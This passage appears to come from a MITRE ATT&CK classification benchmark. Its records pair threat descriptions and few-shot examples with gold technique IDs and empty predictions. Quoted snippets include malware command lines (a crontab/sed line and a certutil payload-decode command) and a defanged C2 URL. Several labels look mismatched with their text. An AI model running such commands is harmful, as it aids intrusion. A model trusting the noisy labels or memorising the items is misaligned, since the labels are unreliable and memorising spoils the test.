knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)\n\t - T1005: Data from Local System\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n\t - T1486: Data Encrypted for Impact\n- Text: Kazuar adds a .lnk file to the Windows startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", + "input": "OSX_OCEANLOTUS.D uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the \"/tmp\" folder.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: The threat actors also collected the files \u201cntds.dit\u201d and the \u201cSYSTEM\u201d registry hive. DHS observed the threat actors compress all of these files into archives named \u201cSYSTEM.zip\u201d and \u201ccomps.zip\n\t - T1560: Archive Collected Data\n- Text: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "FoggyWeb can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.", + "gold": "- T1560.002: Archive Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor installation sequence shows that it\u2019s meant for persistence via /LaunchAgents/com.aex-loop.agent.plist and /Library/LaunchDaemons/com.aex-loop.agent.plist. It initiates the configuration file /Library/Caches/com.applestore.db to set the C&C server IP and for remote session information. Loading the bot plugins, this enables connection to the server to open and wait for commands, update the configuration file based on the commands received, and encrypt the file via AES CBC. If the configuration file already exists, it will decrypt once a new session starts\n\t - T1027: Obfuscated Files or Information\n- Text: Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "DOGCALL is encrypted using single-byte XOR.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLUELIGHT has exfiltrated data over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n- Text: Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Kimsuky has used e-mail to send exfiltrated data to C2 servers.", + "gold": "- T1071.003: Application Layer Protocol - Mail Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks\n\t - T1614.001: System Location Discovery - System Language Discovery\n\t - T1082: System Information Discovery\n- Text: Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present.\n\t - T1120: Peripheral Device Discovery\n- Text: Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with \".Md5.exe\", and if the program is executed from the root of the C:\\ drive, as well as checks for sandbox-related libraries.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "UNC2452 used \"fsutil\" to check available free space before executing actions that might create large files on disk.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\t - T1135: Network Share Discovery\n- Text: FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.\n\t - T1083: File and Directory Discovery\n- Text: The second part of API hooking hooks on \u201cGetExtendedTcpTable. GetExtendedTcpTable\u201d is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat. The purpose of the hook is to remove TCP endpoint records of certain PIDs. The second function, \u201cGetRTTAndHopCount,\u201d acts as the place to put the injected hooking code\n\t - T1049: System Network Connections Discovery\n", + "input": "DEATHRANSOM has the ability to use loop operations to enumerate network resources.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: is usually configured with primary and backup domains for C2 communications.\n\t - T1008: Fallback Channels\n- Text: APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "Stuxnet has the ability to generate new C2 domains.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Green Lambert can use multiple custom routines to decrypt strings prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Saint Bot can download additional files onto a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: ObliqueRAT can hide its payload in BMP images hosted on compromised websites.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", + "input": "Avenger has the ability to decrypt files downloaded from C2.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can register itself for execution and persistence via the Control Panel.\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection\n\t - T1036.007: Masquerading - Double File Extension\n", + "input": "Dacls has had its payload named with a dot prefix to make it hidden from view in the Finder application.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The SecurityAssist task is responsible for running the following command line command that uses the Certutil application to decode the base64 encoded data in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:cmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe & SchTasks /Delete /F /TN SecurityAssist The macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript %APPDATA%\\chkSrv.vbs\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1036: Masquerading\n- Text: APT38 has conducted spearphishing campaigns using malicious email attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.\n\t - T1203: Exploitation for Client Execution\n", + "input": "BRONZE BUTLER has masked executables with document file icons including Word and Adobe PDF.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.\n\t - T1518: Software Discovery\n- Text: FunnyDream can identify the processes for Bkav antivirus.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Ke3chang uses command-line interaction to search files and directories.\n\t - T1083: File and Directory Discovery\n", + "input": "Sidewinder has used tools to enumerate software installed on an infected host.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.\n\t - T1542.003: Pre-OS Boot - Bootkit\n- Text: The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine.\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: As mentioned in the Hermes to Ryuk section, Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. A thread is created for the encryption of each file and each file is encrypted with its own AES key. After the file has been encrypted, a file extension of .RYK is appended to the file. All directories will have a ransom note of (RyukReadMe.txt) written to the directory\n\t - T1486: Data Encrypted for Impact\n", + "input": "WhisperGate overwrites the MBR with a bootloader component that performs destructive wiping operations on hard drives and displays a fake ransom note when the host boots.", + "gold": "- T1542.003: Pre-OS Boot - Bootkit", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.\n\t - T1608.002: Stage Capabilities - Upload Tool\n- Text: Registry key \u201cSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\u201d is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer\n\t - T1090: Proxy\n\t - T1012: Query Registry\n- Text: To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1078: Valid Accounts\n", + "input": "Fox Kitten has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as Ngrok and custom tool SSHMinion.", + "gold": "- T1572: Protocol Tunneling", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script\n\t - T1204.002: User Execution - Malicious File\n- Text: Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open links.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload \u2013 part of Cobalt Strike software \u2013 to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Dridex has relied upon users clicking on a malicious attachment delivered through spearphishing.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1055: Process Injection\n- Text: If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL:http:///what? After issuing the what command, the Trojan will parse the C2\u2019s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit\n\t - T1071: Application Layer Protocol\n\t - T1573: Encrypted Channel\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1571: Non-Standard Port\n\t - T1132: Data Encoding\n\t - T1008: Fallback Channels\n\t - T1043: Commonly Used Port\n- Text: FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.\n\t - T1572: Protocol Tunneling\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "Elise communicates over HTTP or HTTPS for C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses HTTP for command and control communication.\n\t - T1071: Application Layer Protocol\n- Text: Kinsing was executed with an Ubuntu container entry point that runs shell scripts.\n\t - T1609: Container Administration Command\n- Text: In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026 .\n\t - T1219: Remote Access Software\n", + "input": "Hildegard has used an IRC channel for C2 communications.", + "gold": "- T1071: Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.\n\t - T1090.003: Proxy - Multi-hop Proxy\n\t - T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting\n- Text: Mimikatz\u2019s \"LSADUMP::DCSync\" and \"KERBEROS::PTT\" modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "Wizard Spider has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.", + "gold": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HermeticWiper has the ability to deploy through an infected system's default domain policy.\n\t - T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n- Text: The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.\n\t - T1484: Domain or Tenant Policy Modification\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: launched a scheduled task to gain persistence using the schtasks /create /sc command.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Meteor can use group policy to push a scheduled task from the AD to all network machines.", + "gold": "- T1484.001: Domain or Tenant Policy Modification - Group Policy Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.\n\t - T1485: Data Destruction\n- Text: Log keystrokes and the titles of open windows - Gather clipboard data and system information - Steal printer information and any documents that were sent to be printed - Record audio - Capture screenshots and webcam photos\n\t - T1120: Peripheral Device Discovery\n- Text: can list files and directories.\n\t - T1083: File and Directory Discovery\n", + "input": "Industroyer\u2019s data wiper component enumerates specific files on all the Windows drives.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.\n\t - T1083: File and Directory Discovery\n- Text: can use the command-line utility cacls.exe to change file permissions.\n\t - T1059: Command and Scripting Interpreter\n\t - T1222: File and Directory Permissions Modification\n- Text: Crimson can identify the geographical location of a victim host.\n\t - T1614: System Location Discovery\n", + "input": "Kazuar finds a specified directory, lists the files and metadata about those files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: has been used to execute remote commands.\n\t - T1059: Command and Scripting Interpreter\n- Text: uses AppleScript to create a login item for persistence.\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n", + "input": "SLOTHFULMEDIA can open a command line to execute commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: No matching sample found for T1053.007\n- Text: Egregor has used BITSadmin to download and execute malicious DLLs.\n\t - T1197: BITS Jobs\n", + "input": "APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.", + "gold": "- T1053.003: Scheduled Task/Job - Cron", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).\n\t - T1210: Exploitation of Remote Services\n- Text: UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.\n\t - T1021.006: Remote Services - Windows Remote Management\n- Text: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it\n\t - T1072: Software Deployment Tools\n", + "input": "Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We can apply this same concept across other executable traits, such as BOOSTWRITE\u2019s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.\n\t - T1129: Shared Modules\n- Text: downloads an executable and injects it directly into a new 